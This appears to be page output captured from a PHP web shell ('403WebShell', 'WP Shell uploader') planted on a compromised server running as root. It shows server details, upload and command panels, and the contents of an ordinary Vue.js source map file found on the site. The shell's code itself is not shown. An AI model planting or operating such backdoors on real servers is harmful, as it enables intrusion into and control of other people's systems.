Uname:Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64

Base Dir : /var/www/sweetheart.mx/htdocs

User : root


Who Knows WP Shell uploader
Uname:Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 216.238.66.20  /  Your IP : 216.73.216.199
Web Server : nginx/1.30.4
System : Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.2.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/7mares.gamliel.mx/htdocs/app/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/7mares.gamliel.mx/htdocs/app/js/chunk-2d2136d9.47d32b4e.js.map
{"version":3,"sources":["webpack:///./src/views/dashboard/views/videos/ItemDetail.vue","webpack:///src/views/dashboard/views/trainings/ItemDetail.vue","webpack:///./src/views/dashboard/views/videos/ItemDetail.vue?c293","webpack:///./src/views/dashboard/views/videos/ItemDetail.vue?0be4"],"names":["dialog","expression","item","staticClass","attrs","_c","_vm","$t","staticRenderFns","render","name","data","mounted","_this","EventBus","$on","component"],"mappings":"6QAA8QA,W,IAAU,EAAC,K,EAACC,QAAW,G,OAAQ,UAAE,MAAOC,CAAsCC,QAAY,WAAqCC,GAAK,OAAC,C,MAAC,CAAU,sCAAG,YAAC,cAAC,WAAQ,I,MAAmC,CAAC,eAAIC,SAAG,SAAiB,GAAoID,EAAM,UAAe,WAAW,WAAM,CAACC,EAAG,cAAeC,CAAG,EAAG,OAAYC,CACrrB,oBACGC,UAAe,GAAG,OAAE,CAExB,MAASC,C,+jBCoDT,GACAC,KAAA,aACAC,KAAA,WACA,OACAX,QAAA,EACAE,MAAA,IAGAU,QAAA,eAAAC,EAAA,KACAC,SAAAC,IAAA,4BAAAb,GACAW,EAAAX,OACAW,EAAAb,QAAA,OCnEiY,I,YCO7XgB,EAAY,eACd,EACA,EACAR,GACA,EACA,KACA,WACA,MAIa,aAAAQ,E","file":"js/chunk-2d2136d9.47d32b4e.js","sourcesContent":["var render = function render(){var _vm=this,_c=_vm._self._c;return _c('v-row',{attrs:{\"justify\":\"center\"}},[_c('v-dialog',{attrs:{\"transition\":\"dialog-bottom-transition\",\"max-width\":_vm.dialogWidth,\"scrollable\":\"\"},model:{value:(_vm.dialog),callback:function ($$v) {_vm.dialog=$$v},expression:\"dialog\"}},[(_vm.item)?_c('v-card',[_c('v-card-title',{staticClass:\"pa-0\"},[_c('v-toolbar',[_c('v-btn',{attrs:{\"icon\":\"\"},on:{\"click\":function($event){_vm.dialog = false}}},[_c('v-icon',[_vm._v(\"mdi-close\")])],1),_c('v-toolbar-title',[_vm._v(\" \"+_vm._s(_vm.item.persona.fullname)+\" \")])],1)],1),_c('v-card-text',[_c('v-list',{attrs:{\"two-line\":\"\",\"subheader\":\"\"}},[_c('v-subheader',[_vm._v(_vm._s(_vm.$t('app.general.information')))]),_c('v-list-item',[_c('v-list-item-content',[_c('v-list-item-title',[_vm._v(\" \"+_vm._s(_vm.item.persona.fullname)+\" \")]),_c('v-list-item-subtitle',[_vm._v(\" \"+_vm._s(_vm.$t('app.headers.name'))+\" \")])],1)],1),_c('v-list-item',[_c('v-list-item-content',[_c('v-list-item-title',[_vm._v(\" \"+_vm._s(_vm.item.descripcion)+\" \")]),_c('v-list-item-subtitle',[_vm._v(\" \"+_vm._s(_vm.$t('app.headers.description'))+\" \")])],1)],1)],1)],1)],1):_vm._e()],1)],1)\n}\nvar staticRenderFns = []\n\nexport { render, staticRenderFns }","<template>\n  <v-row justify=\"center\">\n    <v-dialog\n      v-model=\"dialog\"\n      transition=\"dialog-bottom-transition\"\n      :max-width=\"dialogWidth\"\n      scrollable\n    >\n      <v-card v-if=\"item\">\n        <v-card-title class=\"pa-0\">\n          <v-toolbar>\n            <v-btn\n              icon\n              @click=\"dialog = false\"\n            >\n              <v-icon>mdi-close</v-icon>\n            </v-btn>\n            <v-toolbar-title>\n              {{ item.persona.fullname }}\n            </v-toolbar-title>\n          </v-toolbar>\n        </v-card-title>\n        <v-card-text>\n          <v-list\n            two-line\n            subheader\n          >\n            <v-subheader>{{ $t('app.general.information') }}</v-subheader>\n            <v-list-item>\n              <v-list-item-content>\n                <v-list-item-title>\n                  {{ item.persona.fullname }}\n                </v-list-item-title>\n                <v-list-item-subtitle>\n                  {{ $t('app.headers.name') }}\n                </v-list-item-subtitle>\n              </v-list-item-content>\n            </v-list-item>\n            <v-list-item>\n              <v-list-item-content>\n                <v-list-item-title>\n                  {{ item.descripcion }}\n                </v-list-item-title>\n                <v-list-item-subtitle>\n                  {{ $t('app.headers.description') }}\n                </v-list-item-subtitle>\n              </v-list-item-content>\n            </v-list-item>\n          </v-list>\n        </v-card-text>\n      </v-card>\n    </v-dialog>\n  </v-row>\n</template>\n\n<script>\n  export default {\n    name: 'ItemDetail',\n    data () {\n      return {\n        dialog: false,\n        item: false,\n      }\n    },\n    mounted() {\n      EventBus.$on('arbitros-detail', (item) => {\n        this.item = item\n        this.dialog = true\n      })\n    },\n  }\n</script>\n\n<style scoped>\n\n</style>\n","import mod from \"-!../../../../../node_modules/cache-loader/dist/cjs.js??ref--13-0!../../../../../node_modules/thread-loader/dist/cjs.js!../../../../../node_modules/babel-loader/lib/index.js!../../../../../node_modules/cache-loader/dist/cjs.js??ref--1-0!../../../../../node_modules/vue-loader/lib/index.js??vue-loader-options!./ItemDetail.vue?vue&type=script&lang=js&\"; export default mod; export * from \"-!../../../../../node_modules/cache-loader/dist/cjs.js??ref--13-0!../../../../../node_modules/thread-loader/dist/cjs.js!../../../../../node_modules/babel-loader/lib/index.js!../../../../../node_modules/cache-loader/dist/cjs.js??ref--1-0!../../../../../node_modules/vue-loader/lib/index.js??vue-loader-options!./ItemDetail.vue?vue&type=script&lang=js&\"","import { render, staticRenderFns } from \"./ItemDetail.vue?vue&type=template&id=93f6a408&scoped=true&\"\nimport script from \"./ItemDetail.vue?vue&type=script&lang=js&\"\nexport * from \"./ItemDetail.vue?vue&type=script&lang=js&\"\n\n\n/* normalize component */\nimport normalizer from \"!../../../../../node_modules/vue-loader/lib/runtime/componentNormalizer.js\"\nvar component = normalizer(\n  script,\n  render,\n  staticRenderFns,\n  false,\n  null,\n  \"93f6a408\",\n  null\n  \n)\n\nexport default component.exports"],"sourceRoot":""}

Youez - 2016 - github.com/yon3zu
LinuXploit